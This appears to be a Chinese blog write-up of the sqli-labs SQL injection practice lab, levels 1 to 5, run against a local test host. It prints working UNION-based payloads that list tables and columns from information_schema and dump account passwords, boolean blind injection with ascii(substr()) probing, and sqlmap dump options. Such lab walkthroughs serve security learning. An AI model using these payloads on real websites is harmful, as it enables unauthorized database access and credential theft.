SQL注入----sqli-labs

最新推荐文章于 2024-10-02 00:27:17 发布
最新推荐文章于 2024-10-02 00:27:17 发布
阅读量166 收藏 1
点赞数
文章标签: 数据库 字符串 SQL注入漏洞 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43821278/article/details/107350362
版权

sqli-labs/Less-

sqli-labs/Less-1

第一关

判断是不是整形(数字型)注入还是字符型注入

http://192.168.111.129/sqli-labs/Less-1/index.php?id=1‘
在这里插入图片描述
在这里插入图片描述
报错语句,用单引号括起来的的
猜测提交的参数是 1’

在这里插入图片描述
【- -+】 是注释,其实- -和#才是注释,在url中,+会变成空格,
【- -’】也可以
在这里插入图片描述
在这里插入图片描述
那为什么不能用#号呢,因为url中#号是用来指导浏览器动作的(例如锚点),对服务器端完全无用。所以,HTTP请求中不包括#
将#号改成url的编码%23就可以了。

Order by是用来猜列数的。这个列数用于union 联合查询,通过尝试我们能发现有三列,

在这里插入图片描述
在这里插入图片描述

  1. 为什么没有出现显示位呢?

在这里插入图片描述

  1. Select 1,2,3的作用是什么呢?

首先union是个联合查询,左边是个查询select语句,右边是个查询select语句,union是个并集,union all默认返回重复的结果集,union 不重复。在网页上由于显示位只会显示第一行(第一个结果)的数据,所以我们要使左边查不到,变成空集,这样就会显示右边的数据了。
在这里插入图片描述

  1. 查询数据库

在这里插入图片描述

  1. 爆表名

union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

information_schema 是个什么库呢?

在这里插入图片描述
在这里插入图片描述

  1. 在information_schema库中先看看schemeta表

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  1. 在information_schema库中看看tables表

在这里插入图片描述

  1. 在information_schema库中看看columns表

在这里插入图片描述
TABLE_SCHEMA
表格所属的库。
TABLE_NAME
表名
COLUMN_NAME
字段名
在这里插入图片描述

这个表有这样两个字段,库名、表名,如上,所以就可以爆出security中的所有表。

  1. 看看这个为什么会报错?

在这里插入图片描述
自己sql语句没学好、select 属性1、属性2、属性3 from 表 where xxx
http://192.168.111.129/sqli-labs/Less-1/index.php?id=-1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘security’,3%23

  1. 下面才是正确的实例:

在这里插入图片描述
http://192.168.111.129/sqli-labs/Less-1/index.php?id=7’ union select 1,group_concat(t.table_name) ,group_concat(c.column_name) from information_schema.tables t,information_schema.columns c where t.table_schema=‘security’ and c.table_name=‘users’%23

在这里插入图片描述
在这里插入图片描述

  1. 爆出所有账户密码

在这里插入图片描述

第二、三、四关

  • 2关

在这里插入图片描述
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ LIMIT 0,1’ at line 1

说明1这个参数没有单引号
在这里插入图片描述
这里使union左边为空集必须得id等于负数,
在这里插入图片描述
在这里插入图片描述

  • 3关

在这里插入图片描述
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’) LIMIT 0,1’ at line 1

说明参数使1‘,且参数带了单引号

在这里插入图片描述
在这里插入图片描述

  • 4关

本题最开始试了好多比如id=,id=1‘,id=’,id=%23均不行
在这里插入图片描述

  • 为什么呢?

发现参数被“”双引号括起来了 ,所以“”里面很多东西都会被认为是字符串的内容,现在我们就尝试 \ 和”
在这里插入图片描述

所以又学到了一个新的姿势。

第五关(盲注)

在这里插入图片描述
经过几番调试,发现页面只有三种状态,那就是“you are in”, ”空白”,报错
然后可以判断这属于bool 类型的盲注,因为没有数据显示
在这里插入图片描述

  • 为什么id=‘1a’返回真值呢,而且id=‘11a’真值,id=‘9a’真值,id=‘20a’假

Sql特性
开始注入、爆库名
http://192.168.111.129/sqli-labs/Less-5/index.php?id=1’ and ascii(substr(database(),1,1))>120 %23 返回假
112真 113真 114真 115假,说明database()第一个字符的ascii码是115,可知是s

  • 看看substr函数,得到长度

接受三个参数,字符串、字串的第一个字符的起始位置、字串的字符个数

ascii(substr(database(),X,1))>0 X遍历数字可以得到database()的长度

ascii(substr(database(),x,1))>Y x属于[1,len(database())],Y的话一般来说是字母a-Z,用二分法【65,122】

  • 爆表名

http://192.168.111.129/sqli-labs/Less-5/index.php?id=1’ and ascii(substr( (select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>0 %23

两个注意的点 第一个:select查询语句要()括起来;第二个:limit 0.1限制一个结果
Sqlmap
Sqlmap -u 注入点 --current-db
-D 指定数据库名称
–tables 列出数据库中的表
-T 指定表名称
–columns 列出表中字段
-C 指定字段
–dump 列出字段数据

旧目难忘
关注
SQLi-Labs 安装
SunJ3t的菠萝屋
05-24 6701
1. 前言 我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。 这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。 注意: PHP 版本一定要设置成 PHP5 以上,PHP7 以下,PHP5 以上才有 information_schema 库,PHP7 之后的 mysql_ 都改成了 mysqli_** 了,所以用其他版本的 PHP
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
Sqli注入
GuaJi_Akai的博客
11-28 218
Less-1 题目:GET-Error based-single quotes-String 1.第一步:输入?id=0‘ ‘‘0’’ LIMIT 0,1’ at line 1 去掉前后两个’ 判断为字符型 2.第二步: 1)order by 数字-+ 判断有多少列(二分法) 3.第三步: 联合查询 在2,3 在这两个位置插入语句进行爆破 4.第四步:爆破 Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admi
SQL注入sqli)
qq_43290573的博客
01-14 497
GET 基于报错类型的SQL注入(联合查询一定要报错) users是一个当前数据库中的一个表,但在其他information_schema数据库中,是以 值 的方式出现,这就是为什么information_schema是mysql数据库的总表 判断字段数 1' order by 4 --+ 1' order by 3 --+ 当有4时报错,说明没有4列 查询当前数据库所有表名 0' un...
SQL注入篇——sqli-labs最详细1-40闯关指南
热门推荐
爱国小白帽
01-11 3万+
使用sqllabs游戏系统进行sql注入 1.首先确定用哪些字符可以进行sql注入 一.选择Less­1进入第一关,在网址中添加标红内容,显示了用户和密码 http://localhost/sqllabs­master/Less­1/index.php?id=1’ and 1=1 ­­ ­ 把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入 二.进入第二关,在网址中添...
sql-lab注入分析
goddemon
07-22 739
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 导致错误:get注入单引号未过滤 List item 判断是否有注入点 输入 ’ 进行判断发现返回的错误类型,即可直接确认有注入点(如果这里返回的值无法确认的话,需 要继续利用and 1=1 and 1=2代判断) 在这里,也可利用引号的数目确认是字符型还是数字类型(因为返回的是’’-1’’,说明是字符类型) 判断字符类 注意这里用–+表示的注释 (典型三类注释 – -
sqli-labs下载与安装
浅笑996的博客
09-28 1万+
Sqli-labs 下载 Sqli-labs是一个印度程序员写的,用来学习sql注入的一个游戏教程。 博客地址为:http://dummy2dummies.blogspot.hk/, 博客当中有一些示例,国内很多博客内容都是从该作者的博客翻译过来的。同时该作者也发了一套相关的视频,在youtube上可以查看。 此处考虑到有些朋友不会FQ,遂分享到国内地址。 http://pan.baidu.com...
SQL注入实验-- SQLi-Labs
m0_51427256的博客
11-19 939
​1、安装phpstudy 1)下载:https://www.xp.cn/ 2)一键式安装:右下角自定义可以更改安装路径 3)打开apache和mysql
sqli-labs-master.zip sql注入的学习靶机
01-18
sql注入的学习靶机,由于github经常挂,这里特提供大家下载。
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
SQLI注入(一)
qq_45927819的博客
07-18 319
Sqli注入主要步骤 联合查询注入 1.测试闭合符号; 常用的有: ’ / ” / ’)/ ”)/) 2.判断列数; order by :用于根据指定的列对结果进行排序(升序1,2,3…); 3.联合查询; union select 1,2,3 database() user() 4.爆数据表 5.爆字段 6.爆值 ...
MySQL之复合查询与内外连接
zdlynj的博客
09-30 1214
前面我们讲解的mysql表的查询都是对一张表进行查询,即数据的查询都是在某一时刻对一个表进行操作的。而在实际开发中,我们往往还需要对多个表同时进行查询。我们这里使用的测试表,为雇员信息表(来自Oracle 9i的经典测试表):EMP员工表,DEPT部门表,SALGRADE工资等级表。
点评项目-2-完善注册登录业务
m0_75138009的博客
09-29 574
需要处理的业务:在网页发送 /user/code 路径下的 post 请求后,我们需要检验手机号后,向合法的手机号发送一个随机生成的电话号。
World of Warcraft [CLASSIC][80][Grandel] Call to Arms: Victory in Wintergrasp
最新发布
qq 117791303
10-02 280
Wintergrasp 冬拥湖 120 VS 120
Spring的热部署工具和数据库密码加盐操作
2301_77053417的博客
09-28 781
加密过程:用户输入的密码+盐值 --> 字符串1,然后使用md5对字符串1加密得到字符串2,然后字符串2+盐值 --> 字符串3,这个字符串3就是存储在数据库中的密文。背景:如果我们的密码明文存储在数据库中,要是被窃取了是非常的危险的,所以我们在数据库中存储的密码不能是明文的,需要进行加密后存储,也就是数据库中存储的是密文。解密过程:取出数据库中的盐值和用户输入的密码得到字符串1,使用md5对字符串1加密得到字符串2,然后验证字符串2和数据库中的密文即可。做好以上的步骤,你项目中的热部署就已经做好了。
Redis事务
zhzjn的博客
09-30 360
Redis事务可以通过MULTI、EXEC、WATCH和DISCARD指令来实现。1. MULTI指令:表示事务的开始,之后的所有指令都会被逐一记录,但不会立即执行。2. EXEC指令:表示事务的执行,会按照记录的指令逐一执行。3. WATCH指令:可以监视一个或多个键的变化,如果在事务执行期间被其他客户端修改,事务会被回滚。4. DISCARD指令:表示事务的撤销,可以放弃之前记录的指令。
【RocketMQ】RocketMQ应用难点
记录一名在读研究生的学习笔记、感悟、开发产物
09-30 880
本文探讨了RocketMQ中消息重复消费的问题及其解决方案,尤其是在CLUSTERING模式下的扩容影响。文章分析了重复消费的原因,如广播模式、负载均衡模式下的多consumerGroup消费、消费者组内的动态变化及网络延迟等,并提出了利用唯一标识进行去重的方法。此外,还讨论了如何选择合适的存储机制以高效处理大量消息标识,如HashMap、MySQL、Redis以及推荐的布隆过滤器等方案。对于防止消息堆积与确保消息不丢失,也给出了相应的策略和技术措施。
SQL注入实战:sqli-labs实验详解
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值